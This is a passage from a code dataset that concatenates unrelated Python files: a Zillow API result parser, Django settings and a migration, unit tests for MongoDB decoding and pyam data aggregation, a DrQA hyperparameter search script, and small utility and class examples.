"""
try:
return self.data.find("result/localRealEstate/region").attrib["name"]
except AttributeError:
return None
@property
def region_id(self):
"""
region id
"""
try:
return self.data.find("result/localRealEstate/region").attrib["id"]
except AttributeError:
return None
@property
def region_type(self):
"""
region type
"""
try:
return self.data.find("result/localRealEstate/region").attrib["type"]
except AttributeError:
return None
class GetUpdatedPropertyDetails(ZillowResults):
"""Maps results from the XML data array into attributes of an instance of GetUpdatedPropertyDetails.
An instance of ``GetUpdatedPropertyDetails`` has the following attributes:
``.agent_name``
``.agent_profile_url``
``.appliances``
``.basement``
``.bathrooms``
``.bedrooms``
``.brokerage``
``.city``
``.cooling_system``
``.elementary_school``
``.exterior_material``
``.floor_material``
``.heating_sources``
``.heating_system``
``.high_school``
``.home_description``
``.home_detail_link``
``.home_info``
``.home_size``
``.home_type``
``.latitude``
``.longitude``
``.middle_school``
``.neighborhood``
``.num_floors``
``.num_rooms``
``.page_view_count_this_month``
``.page_view_count_total``
``.parking_type``
``.photo_gallery``
``.posting_agent``
``.posting_last_update``
``.posting_mls``
``.posting_status``
``.posting_type``
``.price``
``.property_size``
``.roof``
``.rooms``
``.school_district``
``.state``
``.street``
``.view``
``.year_built``
``.year_updated``
``.zillow_id``
``.zipcode``
"""
attribute_mapping = {
# attributes in common with GetDeepSearchResults
"bathrooms": "editedFacts/bathrooms",
"bedrooms": "editedFacts/bedrooms",
"city": "result/address/city",
"home_detail_link": "links/homeDetails",
"home_size": "editedFacts/finishedSqFt",
"home_type": "editedFacts/useCode",
"latitude": "address/latitude",
"longitude": "address/longitude",
"property_size": "editedFacts/lotSizeSqFt",
"state": "result/address/state",
"street": "result/address/street",
"year_built": "editedFacts/yearBuilt",
"zillow_id": "zpid",
"zipcode": "result/address/zipcode",
# new attributes in GetUpdatedPropertyDetails
"agent_name": "posting/agentName",
"agent_profile_url": "posting/agentProfileUrl",
"appliances": "editedFacts/appliances",
"basement": "editedFacts/basement",
"brokerage": "posting/brokerage",
"cooling_system": "editedFacts/coolingSystem",
"elementary_school": "elementarySchool",
"exterior_material": "editedFacts/exteriorMaterial",
"floor_material": "editedFacts/floorCovering",
"heating_sources": "editedFacts/heatingSources",
"heating_system": "editedFacts/heatingSystem",
"high_school": "highSchool",
"home_description": "homeDescription",
"home_info": "links/homeInfo",
"middle_school": "middleSchool",
"neighborhood": "neighborhood",
"num_floors": "editedFacts/numFloors",
"num_rooms": "editedFacts/numRooms",
"page_view_count_this_month": "pageViewCount/currentMonth",
"page_view_count_total": "pageViewCount/total",
"parking_type": "editedFacts/parkingType",
"photo_gallery": "links/photoGallery",
"photo_gallery": "links/photoGallery",
"posting_agent": "posting/agentName",
"posting_last_update": "posting/lastUpdatedDate",
"posting_mls": "posting/mls",
"posting_status": "posting/status",
"posting_type": "posting/type",
"price": "price",
"roof": "editedFacts/roof",
"rooms": "editedFacts/rooms",
"school_district": "schoolDistrict",
"view": "editedFacts/view",
"year_updated": "editedFacts/yearUpdated",
}
def __init__(self, data, *args, **kwargs):
"""Constructor method
"""
self.data = data.findall("response")[0]
for attr in self.attribute_mapping.__iter__():
try:
self.__setattr__(attr, self.get_attr(attr))
except AttributeError:
print("AttributeError with {}".format(attr))
| StarcoderdataPython |
1681748 | import Orange
data = Orange.data.Table("iris.tab")
print("Dataset instances:", len(data))
subset = Orange.data.Table(data.domain, [d for d in data if d["petal length"] > 3.0])
print("Subset size:", len(subset))
| StarcoderdataPython |
4816794 | <filename>ozz/settings.py
"""
Django settings for ozz project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
STATIC_DIR = os.path.join(BASE_DIR, 'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
#LOGIN_URL='/accounts/login/'
#LOGIN_REDIRECT_URL='/'
# Application definition
#
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'sms',
'airtime',
'dashboard',
'payments',
'voice',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'ozz.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ozz.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
#DATABASE_ENGINE = ''
#DATABASE_NAME = ''
#DATABASE_USER = ''
#DATABASE_PASSWORD = ''
#DATABASE_HOST = ''
#DATABASE_PORT = ''
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
STATIC_DIR,
]
#activate django_heroku
import django_heroku
django_heroku.settings(locals())
| StarcoderdataPython |
1724016 | from __future__ import annotations
from unittest import TestCase
from typing import List, Dict
from datetime import date, datetime, timezone
from bson import ObjectId
from jsonclasses import jsonclass, types
from jsonclasses_pymongo import pymongo
from jsonclasses_pymongo.decoder import Decoder
class TestDecoder(TestCase):
def test_decode_str_into_str(self):
@pymongo
@jsonclass
class SimpleDecodeStr:
id: str = types.readonly.str.primary.mongoid.required
val1: str
val2: str
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'val1': '12345',
'val2': '67890'
}
instance = Decoder().decode_root(data, SimpleDecodeStr)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.val1, '12345')
self.assertEqual(instance.val2, '67890')
self.assertIsInstance(instance.val1, str)
self.assertIsInstance(instance.val2, str)
def test_decode_int_into_int(self):
@pymongo
@jsonclass
class SimpleDecodeInt:
id: str = types.readonly.str.primary.mongoid.required
val1: int
val2: int
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'val1': 12345,
'val2': 67890
}
instance = Decoder().decode_root(data, SimpleDecodeInt)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.val1, 12345)
self.assertEqual(instance.val2, 67890)
def test_decode_float_into_float(self):
@pymongo
@jsonclass
class SimpleDecodeFloat:
id: str = types.readonly.str.primary.mongoid.required
val1: float
val2: float
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'val1': 12345.6,
'val2': 67890.1
}
instance = Decoder().decode_root(data, SimpleDecodeFloat)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.val1, 12345.6)
self.assertEqual(instance.val2, 67890.1)
def test_decode_bool_into_bool(self):
@pymongo
@jsonclass
class SimpleDecodeBool:
id: str = types.readonly.str.primary.mongoid.required
val1: bool
val2: bool
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'val1': True,
'val2': False
}
instance = Decoder().decode_root(data, SimpleDecodeBool)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.val1, True)
self.assertEqual(instance.val2, False)
def test_decode_datetime_into_date(self):
@pymongo
@jsonclass
class SimpleDecodeDate:
id: str = types.readonly.str.primary.mongoid.required
val1: date
val2: date
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'val1': datetime(2012, 9, 5, 0, 0, 0),
'val2': datetime(2020, 9, 5, 0, 0, 0),
}
instance = Decoder().decode_root(data, SimpleDecodeDate)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.val1, date(2012, 9, 5))
self.assertEqual(instance.val2, date(2020, 9, 5))
def test_decode_datetime_into_datetime(self):
@pymongo
@jsonclass
class SimpleDecodeDatetime:
id: str = types.readonly.str.primary.mongoid.required
val1: datetime
val2: datetime
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'val1': datetime(2012, 9, 5, 6, 25, 0),
'val2': datetime(2020, 9, 5, 8, 25, 0),
}
instance = Decoder().decode_root(data, SimpleDecodeDatetime)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.val1, datetime(2012, 9, 5, 6, 25, 0, tzinfo=timezone.utc))
self.assertEqual(instance.val2, datetime(2020, 9, 5, 8, 25, 0, tzinfo=timezone.utc))
def test_decode_embedded_list(self):
@pymongo
@jsonclass
class SimpleDecodeList:
id: str = types.readonly.str.primary.mongoid.required
vals: List[int]
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'vals': [1, 2, 3, 4, 5]
}
instance = Decoder().decode_root(data, SimpleDecodeList)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.vals, [1, 2, 3, 4, 5])
def test_decode_local_keys_list(self):
@pymongo
@jsonclass
class SimpleDecodeLocalKeyListAddress:
id: str = types.readonly.str.primary.mongoid.required
city: str
owner: SimpleDecodeLocalKeyList = types.objof(
'SimpleDecodeLocalKeyList').linkedby('address')
@pymongo
@jsonclass
class SimpleDecodeLocalKeyList:
id: str = types.readonly.str.primary.mongoid.required
addresses: List[SimpleDecodeLocalKeyListAddress] = (types.linkto
.listof(SimpleDecodeLocalKeyListAddress))
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'addressIds': [ObjectId(), ObjectId()]
}
instance = Decoder().decode_root(data, SimpleDecodeLocalKeyList)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(getattr(instance, 'address_ids')
[0], str(data['addressIds'][0]))
self.assertEqual(getattr(instance, 'address_ids')
[1], str(data['addressIds'][1]))
def test_decode_embedded_dict(self):
@pymongo
@jsonclass
class SimpleDecodeDict:
id: str = types.readonly.str.primary.mongoid.required
vals: Dict[str, int]
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'vals': {'one': 1, 'two': 2}
}
instance = Decoder().decode_root(data, SimpleDecodeDict)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.vals, {'one': 1, 'two': 2})
def test_decode_embedded_instance(self):
@pymongo
@jsonclass
class SimpleDecodeInstanceAddress:
id: str = types.readonly.str.primary.mongoid.required
city: str
@pymongo
@jsonclass
class SimpleDecodeInstance:
id: str = types.readonly.str.primary.mongoid.required
address: SimpleDecodeInstanceAddress
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'address': {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'city': 'Shanghai'
}
}
instance = Decoder().decode_root(data, SimpleDecodeInstance)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(instance.address.id, str(data['address']['_id']))
self.assertEqual(instance.address.city, "Shanghai")
def test_decode_local_key_instance(self):
@pymongo
@jsonclass
class SimpleDecodeLocalKeyInstanceAddress:
id: str = types.readonly.str.primary.mongoid.required
city: str
owner: SimpleDecodeLocalKeyInstance = types.objof(
'SimpleDecodeLocalKeyInstance').linkedby('address')
@pymongo
@jsonclass
class SimpleDecodeLocalKeyInstance:
id: str = types.readonly.str.primary.mongoid.required
address: SimpleDecodeLocalKeyInstanceAddress = (types
.linkto.objof(
SimpleDecodeLocalKeyInstanceAddress))
data = {
'_id': ObjectId(),
'createdAt': datetime.now(),
'updatedAt': datetime.now(),
'addressId': ObjectId()
}
instance = Decoder().decode_root(data, SimpleDecodeLocalKeyInstance)
self.assertEqual(instance.id, str(data['_id']))
self.assertEqual(getattr(instance, 'address_id'),
str(data['addressId']))
def test_decode_keep_dict_keys(self):
@pymongo
@jsonclass
class MediumDecodeCamelizeDictKeys:
id: str = types.readonly.str.primary.mongoid.required
val: Dict[str, str] = types.dictof(types.str)
data = {
'val': {
'keyOne': 'val_one',
'keyTwo': 'val_two'
}
}
instance = Decoder().decode_root(data, MediumDecodeCamelizeDictKeys)
self.assertEqual(
instance.val, {'keyOne': 'val_one', 'keyTwo': 'val_two'})
| StarcoderdataPython |
1786964 | <reponame>francescolovat/pyam
import pytest
import logging
import numpy as np
import pandas as pd
from pyam import check_aggregate, IamDataFrame, IAMC_IDX
from conftest import TEST_DTS
def test_missing_region(check_aggregate_df):
# for now, this test makes sure that this operation works as expected
exp = check_aggregate_df.aggregate_region('Primary Energy', region='foo')
assert len(exp) == 8
# # this test should be updated to the below after the return type of
# # aggregate_region() is updated
# exp = check_aggregate_df.aggregate_region(
# 'Primary Energy', region='foo', append=False
# ).data
# check_aggregate_df.aggregate_region(
# 'Primary Energy', region='foo', append=True
# )
# obs = check_aggregate_df.filter(region='foo').data
# assert len(exp) > 0
# pd.testing.assert_frame_equal(obs.reset_index(drop=True),
# exp.reset_index(drop=True))
def test_aggregate_region_extra_subregion():
cols = ['model', 'scenario', 'region', 'variable', 'unit', 2005, 2010]
data = pd.DataFrame([
['model_a', 'scen_a', 'foo', 'Primary Energy', 'EJ/y', 1, 6],
['model_a', 'scen_a', 'bar', 'Primary Energy', 'EJ/y', 0.75, 5]],
columns=cols)
df = IamDataFrame(data=data)
obs = df.aggregate_region(variable='Primary Energy',
region='R5ASIA',
subregions=['foo', 'bar', 'baz'],
components=[], append=False)
assert len(obs) == 2
def test_aggregate_region_missing_all_subregions():
cols = ['model', 'scenario', 'region', 'variable', 'unit', 2005, 2010]
data = pd.DataFrame([
['model_a', 'scen_a', 'foo', 'Primary Energy', 'EJ/y', 1, 6],
['model_a', 'scen_a', 'bar', 'Primary Energy', 'EJ/y', 0.75, 5]],
columns=cols)
df = IamDataFrame(data=data)
obs = df.aggregate_region(variable='Primary Energy',
region='R5ASIA',
subregions=['China', 'Vietnam', 'Japan']
)
assert len(obs) == 0
def test_do_aggregate_append(meta_df):
meta_df.rename({'variable': {'Primary Energy': 'Primary Energy|Gas'}},
inplace=True)
meta_df.aggregate('Primary Energy', append=True)
obs = meta_df.filter(variable='Primary Energy').timeseries()
dts = TEST_DTS
times = [2005, 2010] if "year" in meta_df.data else dts
exp = pd.DataFrame([
['model_a', 'scen_a', 'World', 'Primary Energy', 'EJ/y', 1.5, 9.],
['model_a', 'scen_b', 'World', 'Primary Energy', 'EJ/y', 2, 7],
],
columns=['model', 'scenario', 'region', 'variable', 'unit'] + times
).set_index(IAMC_IDX)
if "year" in meta_df.data:
exp.columns = list(map(int, exp.columns))
else:
exp.columns = pd.to_datetime(exp.columns)
pd.testing.assert_frame_equal(obs, exp)
def test_check_aggregate_pass(check_aggregate_df):
obs = check_aggregate_df.filter(
scenario='a_scen'
).check_aggregate('Primary Energy')
assert obs is None
def test_check_internal_consistency_no_world_for_variable(
check_aggregate_df, caplog
):
assert check_aggregate_df.check_internal_consistency() is None
test_df = check_aggregate_df.filter(
variable='Emissions|CH4', region='World', keep=False
)
caplog.set_level(logging.INFO, logger="pyam.core")
test_df.check_internal_consistency()
warn_idx = caplog.messages.index("variable `Emissions|CH4` does not exist "
"in region `World`")
assert caplog.records[warn_idx].levelname == "INFO"
def test_check_aggregate_fail(meta_df):
obs = meta_df.check_aggregate('Primary Energy', exclude_on_fail=True)
assert len(obs.columns) == 2
assert obs.index.get_values()[0] == (
'model_a', 'scen_a', 'World', 'Primary Energy', 'EJ/y'
)
def test_check_aggregate_top_level(meta_df):
obs = check_aggregate(meta_df, variable='Primary Energy', year=2005)
assert len(obs.columns) == 1
assert obs.index.get_values()[0] == (
'model_a', 'scen_a', 'World', 'Primary Energy', 'EJ/y'
)
def test_df_check_aggregate_pass(check_aggregate_df):
obs = check_aggregate_df.check_aggregate('Primary Energy')
assert obs is None
for variable in check_aggregate_df.variables():
obs = check_aggregate_df.check_aggregate(variable)
assert obs is None
def test_df_check_aggregate_region_pass(check_aggregate_df):
obs = check_aggregate_df.check_aggregate_region('Primary Energy')
assert obs is None
for variable in check_aggregate_df.variables():
obs = check_aggregate_df.check_aggregate_region(variable)
assert obs is None
def run_check_agg_fail(pyam_df, tweak_dict, test_type):
mr = pyam_df.data.model == tweak_dict['model']
sr = pyam_df.data.scenario == tweak_dict['scenario']
rr = pyam_df.data.region == tweak_dict['region']
vr = pyam_df.data.variable == tweak_dict['variable']
ur = pyam_df.data.unit == tweak_dict['unit']
row_to_tweak = mr & sr & rr & vr & ur
assert row_to_tweak.any()
pyam_df.data.value.iloc[np.where(row_to_tweak)[0]] *= 0.99
# the error variable is always the top level one
expected_index = tweak_dict
agg_test = test_type == 'aggregate'
region_world_only_contrib = test_type == 'region-world-only-contrib'
if agg_test or region_world_only_contrib:
expected_index['variable'] = '|'.join(
expected_index['variable'].split('|')[:2]
)
elif 'region' in test_type:
expected_index['region'] = 'World'
expected_index = [v for k, v in expected_index.items()]
for variable in pyam_df.variables():
if test_type == 'aggregate':
obs = pyam_df.check_aggregate(
variable,
)
elif 'region' in test_type:
obs = pyam_df.check_aggregate_region(
variable,
)
if obs is not None:
assert len(obs.columns) == 2
assert set(obs.index.get_values()[0]) == set(expected_index)
def test_df_check_aggregate_fail(check_aggregate_df):
to_tweak = {
'model': 'IMG',
'scenario': 'a_scen_2',
'region': 'R5REF',
'variable': 'Emissions|CO2',
'unit': 'Mt CO2/yr',
}
run_check_agg_fail(check_aggregate_df, to_tweak, 'aggregate')
def test_df_check_aggregate_fail_no_regions(check_aggregate_df):
to_tweak = {
'model': 'MSG-GLB',
'scenario': 'a_scen_2',
'region': 'World',
'variable': 'Emissions|C2F6|Solvents',
'unit': 'kt C2F6/yr',
}
run_check_agg_fail(check_aggregate_df, to_tweak, 'aggregate')
def test_df_check_aggregate_region_fail(check_aggregate_df):
to_tweak = {
'model': 'IMG',
'scenario': 'a_scen_2',
'region': 'World',
'variable': 'Emissions|CO2',
'unit': 'Mt CO2/yr',
}
run_check_agg_fail(check_aggregate_df, to_tweak, 'region')
def test_df_check_aggregate_region_fail_no_subsector(check_aggregate_df):
to_tweak = {
'model': 'MSG-GLB',
'scenario': 'a_scen_2',
'region': 'R5REF',
'variable': 'Emissions|CH4',
'unit': 'Mt CH4/yr',
}
run_check_agg_fail(check_aggregate_df, to_tweak, 'region')
def test_df_check_aggregate_region_fail_world_only_var(check_aggregate_df):
to_tweak = {
'model': 'MSG-GLB',
'scenario': 'a_scen_2',
'region': 'World',
'variable': 'Emissions|CO2|Agg Agg',
'unit': 'Mt CO2/yr',
}
run_check_agg_fail(
check_aggregate_df, to_tweak, 'region-world-only-contrib'
)
def test_df_check_aggregate_region_errors(check_aggregate_regional_df):
# these tests should fail because our dataframe has continents and regions
# so checking without providing components leads to double counting and
# hence failure
obs = check_aggregate_regional_df.check_aggregate_region(
'Emissions|N2O', 'World'
)
assert len(obs.columns) == 2
assert obs.index.get_values()[0] == (
'AIM', 'cscen', 'World', 'Emissions|N2O', 'Mt N/yr'
)
obs = check_aggregate_regional_df.check_aggregate_region(
'Emissions|N2O', 'REUROPE'
)
assert len(obs.columns) == 2
assert obs.index.get_values()[0] == (
'AIM', 'cscen', 'REUROPE', 'Emissions|N2O', 'Mt N/yr'
)
def test_df_check_aggregate_region_components(check_aggregate_regional_df):
obs = check_aggregate_regional_df.check_aggregate_region(
'Emissions|N2O', 'World', subregions=['REUROPE', 'RASIA']
)
assert obs is None
obs = check_aggregate_regional_df.check_aggregate_region(
'Emissions|N2O|Ind|Solvents', 'World', subregions=['REUROPE', 'RASIA']
)
assert obs is None
obs = check_aggregate_regional_df.check_aggregate_region(
'Emissions|N2O', 'REUROPE', subregions=['Germany', 'UK']
)
assert obs is None
obs = check_aggregate_regional_df.check_aggregate_region(
'Emissions|N2O', 'RASIA', subregions=['China', 'Japan']
)
assert obs is None
obs = check_aggregate_regional_df.check_aggregate_region(
'Emissions|N2O|Ind|Transport', 'REUROPE', subregions=['Germany', 'UK']
)
assert obs is None
@pytest.mark.parametrize("components,exp_vals", (
# should find sub-components including nested bunkers
(None, [1.9, 15.7]),
# should only add AFOLU onto regional sum, not Shipping emissions
(["Emissions|N2O|AFOLU"], [0.9, 9.7]),
# specifying Ind leads to double counting (and not skipping AFOLU) but as
# it's user specified no warning etc. is raised
(["Emissions|N2O|Ind"], [2.6, 25.2]),
))
def test_aggregate_region_components_handling(check_aggregate_regional_df,
components, exp_vals):
tdf = check_aggregate_regional_df.filter(variable="*N2O*")
# only get Europe and Asia to avoid double counting
res = tdf.aggregate_region("Emissions|N2O", components=components,
subregions=["REUROPE", "RASIA"])
exp_idx = pd.MultiIndex.from_product(
[["AIM"], ["cscen"], ["Mt N/yr"], [2005, 2010]],
names=["model", "scenario", "unit", "year"]
)
exp = pd.Series(exp_vals, index=exp_idx)
exp.name = "value"
pd.testing.assert_series_equal(res, exp)
def test_check_aggregate_region_no_world(check_aggregate_regional_df, caplog):
test_df = check_aggregate_regional_df.filter(region='World', keep=False)
caplog.set_level(logging.INFO, logger="pyam.core")
test_df.check_aggregate_region('Emissions|N2O', region='World')
warn_idx = caplog.messages.index("variable `Emissions|N2O` does not exist "
"in region `World`")
assert caplog.records[warn_idx].levelname == "INFO"
| StarcoderdataPython |
1711351 | <gh_stars>0
import itertools
import os
import subprocess
import numpy as np
import time
import datetime
from hyperopt import hp
import pandas as pd
HomeDir = os.environ.get('HOME')
# os.chdir(os.path.join(HomeDir,"CS3244/DrQA"))
os.chdir(os.path.join(HomeDir,"DrQA"))
# print(os.getcwd())
top10_result = "validation/top10_result.csv"
hide_output = False
MAX_EVALS = 1
#### Fixed Parameters ##
fixed_params ={
"--num-epoch" : 1,
"--embedding-file": "glove.6B.200d.txt",
"--model-name": "",
"--model-dir": "",
"--train-file": "ln_train-processed-corenlp.txt",
"--dev-file": "ln_dev-processed-corenlp.txt",
"--dev-json": "ln_dev.json",
"--train-json": "ln_train.json",
"--pretrained": "models/pre_trained_single/64_2_no_concat_200.mdl"
}
#### Hyper parameters ###
params = {
"--batch-size" : hp.choice('--batch-size',[32]),
"--model-type" : hp.choice('--model-type',['rnn']),
"--hidden-size": hp.choice('--hidden-size',[64]),
"--doc-layers" : hp.choice('--doc-layers',[2]),
"--question-layers" :hp.choice('--question-layers',[2]),
"--rnn-type" :hp.choice('--rnn-type',['LSTM']),
"--concat-rnn-layers" : hp.choice('--concat-rnn-layers',[False]),
"--question-merge" :hp.choice('--question-merge',['self_attn']),
"--dropout-emb" :hp.uniform('--dropout-emb',0,1),
"--dropout-rnn" :hp.uniform('--dropout-rnn',0,1),
"--dropout-rnn-output" :hp.choice('--dropout-rnn-output',[True,False]),
"--grad-clipping" :hp.choice('--grad-clipping',[10]),
"--weight-decay" :hp.uniform('--weight-decay',0,1),
"--momentum" :hp.uniform('--momentum',0,1),
"--fix-embedding" :hp.choice('--fix-embedding',[True,False]),
"--tune-partial" : hp.choice('--tune-partial',[1000]),
"--rnn-padding" :hp.choice('--rnn-padding',[True, False]),
"--max-len" : hp.choice('--max-len',[15])}
def objective(param):
start = time.time()
CMD ="python scripts/reader/train.py"
model_name = "_".join(list(map(lambda x: str(x),param.values())))
model_dir = "models/val_models/" + model_name + "/"
fixed_params["--model-name"] = model_name
fixed_params["--model-dir"] = model_dir
for name,value in fixed_params.items():
CMD += " " + name + " " + str(value)
for name,value in param.items():
CMD = CMD + " " + name + " " + str(value)
if hide_output:
CMD = CMD +" &> /dev/null"
os.system("bash -c \"" + CMD+"\"")
with open(model_dir + model_name+"_best.txt",'r') as log:
log_ = log.readline().split(',')
F1 = -float(log_[1])
end = time.time()
time_elapsed = end -start
print("Comb: " + str(ith[0]))
print("F1: "+ str(log_[1]) +" EM: " + str(log_[2]))
print("Time Elapsed: " + str(datetime.timedelta(seconds = time_elapsed)))
print("Time Remaining: " + str(datetime.timedelta(seconds = time_elapsed*(MAX_EVALS -ith[0]))))
print("_"*100)
ith[0] = ith[0]+1
results = {'loss':F1,'status': STATUS_OK, 'x': param, 'time':time_elapsed}
return results
from hyperopt import Trials
from hyperopt import fmin
from hyperopt import rand, tpe
from hyperopt import STATUS_OK
ith = [1]
tpe_algo = tpe.suggest
tpe_trials = Trials()
best = fmin(fn = objective,space = params,algo=tpe_algo, trials= tpe_trials,
max_evals = MAX_EVALS,rstate = np.random.RandomState(50))
print('Minimum loss attained with TPE: {:.4f}'.format(tpe_trials.best_trial['result']['loss']))
print(len(tpe_trials.results))
results = tpe_trials.results
results_df = pd.DataFrame({'loss': [x['loss'] for x in results],
'x': [x['x'] for x in results] })
results_df = results_df.sort_values('loss', ascending = True)
results_df.to_csv('validation/data_frame_result.csv',sep =",")
result = open(top10_result,'w')
header = ",".join(['epoch_best','F1_Dev_best','EM_Dev_best','S_Dev_best','E_Dev_best','Exact_Dev_best','F1_Train','EM_train','S_Train','E_Train','Exact_Train','Loss_Train'])
result.write(header+"\n")
if len(results)>=10:
top_10 = int(len(results)/20)
else:
top_10 = 1
for i in range(top_10):
param = results[i]['x']
CMD ="python scripts/reader/train.py"
model_name = "_".join(list(map(lambda x: str(x),param.values())))
model_dir = "models/val_models/" + model_name + "/"
fixed_params["--model-name"] = model_name
fixed_params["--model-dir"] = model_dir
fixed_params["--num-epoch"] = 1
for name,value in fixed_params.items():
CMD += " " + name + " " + str(value)
for name,value in param.items():
CMD = CMD + " " + name + " " + str(value)
if hide_output:
CMD = CMD +" &> /dev/null"
os.system("bash -c \"" + CMD+"\"")
log_result =[]
with open(model_dir + model_name+"_best.txt",'r') as log:
log_ = log.readline().split(' ')
log_result.extend(log_)
result.write(",".join(log_result)+"\n")
result.close()
| StarcoderdataPython |
3290841 | import fnmatch
import string
def timeCheck(line):
timePhrase = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday',
'sunday', 'january', 'jan', 'february', 'feb', 'march', 'mar', 'april', 'apr', 'may', 'june', 'jun',
'july',
'august', 'aug', 'september', 'sep', 'october', 'oct', 'november', 'nov', 'december', 'dec', 'am',
'pm',
'morning', 'afternoon', 'night', 'midnight', 'day', 'week', 'month', 'year', 'second',
'minute', 'hour', 'noon', 'clock', 'oclock']
a = line.lower().translate(str.maketrans('','',string.punctuation)).split()
return set(a).intersection(timePhrase)
#if str.lower() in timePhrase:
#print(timePhrase.index(str.lower()))
#print(timePhrase.index('aug'))
| StarcoderdataPython |
1606761 | <reponame>ciwan6521/udemy
# -*- coding: utf-8 -*-
class ögretmen():
def __init__(self,ad,soyad,telefon,maas,dersler):
self.ad = ad
self.soyad = soyad
self.telefon = telefon
self.maas = maas
self.ders = dersler
def bilgiler(self):
print("""
Öğretmenin Adı : {}
Öğretmenin Soyadı : {}
Öğretmenin Numarası : {}
Öğretmenin Maaşı : {}
Öğretmenin Bildiği Dersler : {}
""".format(self.ad,self.soyad,self.telefon,self.maas,self.ders))
def zamyap(self,zammiktarı):
self.maas = self.maas + zammiktarı
Murat = ögretmen("Murat","Kaya",123,5000,["Matematik","Fen","İngilizce"])
print(Murat.zamyap(750))
print(Murat.bilgiler())
| StarcoderdataPython |
192001 | # Generated by Django 3.2.dev20200604053612 on 2020-06-07 07:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('project', '0007_auto_20200606_1112'),
]
operations = [
migrations.AddField(
model_name='menu',
name='location',
field=models.CharField(blank=True, choices=[('Koulukatu', 'Koulukatu'), ('Ideapark', 'Ideapark')], max_length=30),
),
migrations.AlterField(
model_name='menu',
name='picture',
field=models.ImageField(upload_to=''),
),
]
| StarcoderdataPython |
33224 | #!/usr/bin/env python3
#===============================================================================
# Copyright (c) 2020 <NAME>
# Lab of Dr. <NAME> and Dr. <NAME>
# University of Michigan
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#============================================================================
############################
##### IMPORT MODULES #######
###########################
import os
import sys
import sqlite3
import rsidx
import argparse
import gzip
